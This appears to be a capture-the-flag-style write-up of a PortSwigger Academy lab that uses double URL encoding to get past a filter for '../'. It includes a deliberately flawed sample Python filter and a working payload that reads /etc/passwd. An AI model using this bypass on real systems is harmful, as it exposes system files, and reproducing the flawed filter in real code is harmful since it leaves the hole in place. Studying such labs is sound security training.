๐ File path traversal, traversal sequences stripped with superfluous URL-decode
Detailed analysis of the lab 'File path traversal, traversal sequences stripped with superfluous URL-decode' from the PortSwigger Academy Path traversal series
This lab contains a path traversal vulnerability in the display of product images. The application blocks input containing path traversal sequences. It then performs a URL-decode of the input before using it. To solve the lab, retrieve the contents of the /etc/passwd file.
๐ง Lab Setup & Files
Files and Environment
1
Files:None
๐ Initial Analysis
First Steps
In this lab, unlike the first one (File path traversal, simple case), which you can refer to since the vulnerability is in the same parameter, the difference is that the payload undergoes URL decoding before retrieving the file. Letโs move on to the exploitation phase.
๐ฌ Vulnerability Analysis
Potential Attack Vectors
Path Traversal
๐ฏ Solution Path
Step-by-Step Guide
Initial setup
First, letโs understand what URL encoding is. When browsing the internet, we often come across strange URLs containing characters like %25. This is called URL Encoding.
It is used to avoid ambiguities or interpretation issues for the server since some characters are considered special, just like wildcards (e.g., *) in Linux.
URL encoding is also known as percent encoding because it involves converting a character into its hexadecimal ASCII representation, preceded by %.
Now, for a practical example of how the server might be structured, Iโll use Python and the urllib.parse library, which is specifically designed for proper URL formatting.
Most likely, the server has code similar to this:
1
2
3
4
5
6
filename=request.args.get('filename','')if"../"infilename:return"Resources Not Found",404decoded_filename=urllib.parse.unquote(filename)...
This code retrieves the filename parameter from the GET request, checks if it contains the dot-dot-slash path traversal sequence, and then performs URL decoding before using it as a path to return the requested resource.
(This is just an example, of course!)
If we try to pass ../../../etc/passwd, we will be blocked. However, itโs important to consider that the request.args.get() function already performs URL decoding on the parameter.
So, if we encode the payload only once, it will be decoded into ../../../etc/passwd, triggering the security check and blocking our request.
Letโs move on to the next phase.
Exploitation
To bypass the security check, we can simply apply double URL encoding.
This way, the request.args.get() function will decode our first payload, which contains the path traversal sequence ..%252f, transforming it into ..%2f, which is just an encoded version of ../.
Since "../" != "..%2f", this will bypass the filter. Then, when the second URL decoding occurs before returning the resource, the path will be correctly interpreted.
To perform URL encoding, we can use Pythonโs urllib.parse library or CyberChef:
Double Url Decode
With double encoding, / becomes %252f. The first encoding transforms / into %2f.
Then, in the second encoding, only % is encoded as %25, resulting in %252f.
When the server applies the first decoding, %252f turns into %2f, which is not equal to /.
Therefore, it bypasses the security check:
Url Decode
Now, we can construct the final payload: filename=..%252f..%252f..%252fetc/passwd
Making a request to: https://0ac4003503712887854b916d00f50069.web-security-academy.net/image?filename=..%252f..%252f..%252fetc/passwd
This allows us to access /etc/passwd:
Passwd
Solution Confirmation
Lab Solution
๐ ๏ธ Exploitation Process
Technical Approach
The automatic exploit performs a simple GET request with the parameter: filename=..%2f..%2f..%2fetc%2fpasswd.
However, remember that we need double encoding.
So why did I only apply single encoding in the exploit?
The reason is that when making a request with requests in Python, the library automatically encodes parameters before sending the request.
This means the second encoding will be handled by requests itself only if the payload contains raw special characters like %.
Replace special characters in _string_ using the `%_xx_` escape. Letters, digits, and the characters `'_.-~'` are never quoted. By default, this function is intended for quoting the path section of a URL. The optional _safe_ parameter specifies additional ASCII characters that should not be quoted โ its default value is `'/'`.
As we can see, / is not encoded by default because it is included in the safe characters list.
If we donโt specify the safe parameter, it is set to / by default, meaning / will not be encoded at all:
Wrong Quote
However, we can set safe to an empty string:
1
urllib.parse.quote("../../../etc/passwd",safe="")
This way, / is no longer treated as a safe character and will be properly encoded:
Correct Quote
I wanted to clarify this because Iโll also include an alternative version of the exploit that doesnโt require manually encoding characters with CyberChef.